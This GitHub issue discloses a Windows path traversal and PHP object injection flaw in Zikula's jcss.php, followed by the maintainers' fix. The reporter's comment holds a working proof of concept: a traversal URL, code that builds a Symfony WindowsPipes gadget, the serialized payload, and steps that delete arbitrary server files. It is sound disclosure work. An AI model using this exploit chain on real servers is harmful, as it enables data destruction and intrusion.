Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

"jcss.php" file read vulnerability (windows environment) #3237

Closed
Xyntax opened this issue Dec 3, 2016 · 3 comments
Closed

"jcss.php" file read vulnerability (windows environment) #3237

Xyntax opened this issue Dec 3, 2016 · 3 comments
Labels
Bug
Milestone
1.3.11

Comments

@Xyntax
Copy link

Xyntax commented Dec 3, 2016

relative codes in ./jcss.php :

$f = (isset($_GET['f']) ? filter_var($_GET['f'], FILTER_SANITIZE_STRING) : false);

if (!$f) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

// clean $f
$f = preg_replace('`/`', '', $f);

// set full path to the file
$f = $ZConfig['System']['temp'] . '/Theme_cache/' . $f;

if (!is_readable($f)) {
    header('HTTP/1.0 400 Bad request');
    die('ERROR: Requested file not readable.');
}

// child lock
$signingKey = md5(serialize($ZConfig['DBInfo']['databases']['default']));

$contents = file_get_contents($f);
if (!DataUtil::is_serialized($contents, false)) {
    header('HTTP/1.0 500 Internal error');
    die('ERROR: Corrupted file.');
}

$dataArray = unserialize($contents);

On windows platform we can bypass regex filter with ..\
PoC: http://localhost/zikula4/jcss.php?f=..\..\..\..\..\jcss.php

the result of file_get_contents() was brought into unserialize(), when unserialize() is used on user supplied data it often leads to PHP Object Injection.

here we can launch further attacks with __destruct() in ./vendor/symfony/symfony/src/Symfony/Component/Process/Pipes/WindowsPipes.php.

PoC: delete files on windows server.

Add a public func in class WindowsPipes:

public function setattr(){
		$this->files = array('D:\phpStudy\WWW\zikula4\userdata\delete.txt'); // file U wants to delete
		$this->fileHandles = array();	
	}

Serialize an WindowsPipes object and write it to file:

$obj = new WindowsPipes(true,null);
$obj->setattr(); 
file_put_contents('./exp.txt',serialize($obj));

exp.txt

O:44:"Symfony\Component\Process\Pipes\WindowsPipes":8:{s:51:" Symfony\Component\Process\Pipes\WindowsPipes files";a:1:{i:0;s:21:".\userdata\delete.txt";}s:57:" Symfony\Component\Process\Pipes\WindowsPipes fileHandles";a:0:{}s:55:" Symfony\Component\Process\Pipes\WindowsPipes readBytes";a:2:{i:1;i:0;i:2;i:0;}s:59:" Symfony\Component\Process\Pipes\WindowsPipes disableOutput";b:1;s:5:"pipes";a:0:{}s:58:" Symfony\Component\Process\Pipes\AbstractPipes inputBuffer";s:0:"";s:52:" Symfony\Component\Process\Pipes\AbstractPipes input";N;s:54:" Symfony\Component\Process\Pipes\AbstractPipes blocked";b:1;}

Upload exp.txt to ./userdata folder on windows server.
Then request http://localhost/zikula4/jcss.php?f=..\..\..\..\..\userdata\exp.txt, and your target file will be deleted. (D:\phpStudy\WWW\zikula4\userdata\delete.txt in my test).
@Guite Guite added this to the 1.3.11 milestone Dec 3, 2016
@Guite Guite added the Bug label Dec 3, 2016
Guite added a commit that referenced this issue Dec 3, 2016
@Guite
clean backslashes to prevent invalid Windows pathes, fixed #3237
e108ef1
This was referenced Dec 3, 2016
Closed
Closed
@Guite
Copy link
Member

Guite commented Dec 3, 2016

Hi @Xyntax

can you please verify whether #3240 correctly fixes this issue?

@Xyntax
Copy link
Author

Xyntax commented Dec 3, 2016

fixed

Guite added a commit that referenced this issue Dec 3, 2016
@Guite
fixed #3237
1a8220a
@Guite Guite closed this as completed in 3ab9614 Dec 3, 2016
@Guite
Copy link
Member

Guite commented Dec 3, 2016

Fixed in 1.3 and 1.4:

1a8220a
3ab9614

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug
Projects
None yet
Milestone
1.3.11
Development

No branches or pull requests
2 participants
@Guite @Xyntax